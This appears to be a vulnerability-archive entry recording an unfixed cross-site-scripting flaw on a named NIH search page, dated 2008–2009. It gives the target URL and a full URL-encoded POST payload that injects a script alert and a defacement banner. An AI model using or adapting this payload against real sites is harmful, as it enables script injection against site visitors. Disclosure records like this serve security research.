Security researcher xylitol, has submitted on 04/10/2008 a cross-site-scripting (XSS) vulnerability affecting trans.nih.gov, which at the time of submission ranked 463 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/09/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 04/10/2008 |
Date published: 01/09/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: xylitol |
Domain: trans.nih.gov |
Category: XSS |
Pagerank: 463 |
URL: http://trans.nih.gov/cehp/hbq/search.asp |
POST: SUBMIT=Submit+Query&a_0_1=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmar quee%3E%3Ch1%3EXSS+by+Xylitol%3C%2Fh1%3E%3C%2Fmarquee%3E&study_id=&a_0_2=&a_0_3=&search_type1=OR&sea rch_type2=OR&search_type3=OR&search_type4=OR&search_type5=OR&search_type6=OR&search_type7=OR&search_ type8=OR&search_type9=OR&search_type10=OR&search_type11=OR&search_type12=OR&search_type13=OR&search_ type14=OR&search_type15=OR&search_type16=OR&search_type17=OR&search_type18=OR&search_type19=OR&searc h_type20=OR&search_type21=OR&search_type22=OR&search_type23=OR&search_type24=OR&search_type25=OR&sea rch_type26=OR&search_type27=OR&search_type28=OR&search_type29=OR&search_type30=OR |
Click here to view the mirror
|
|
|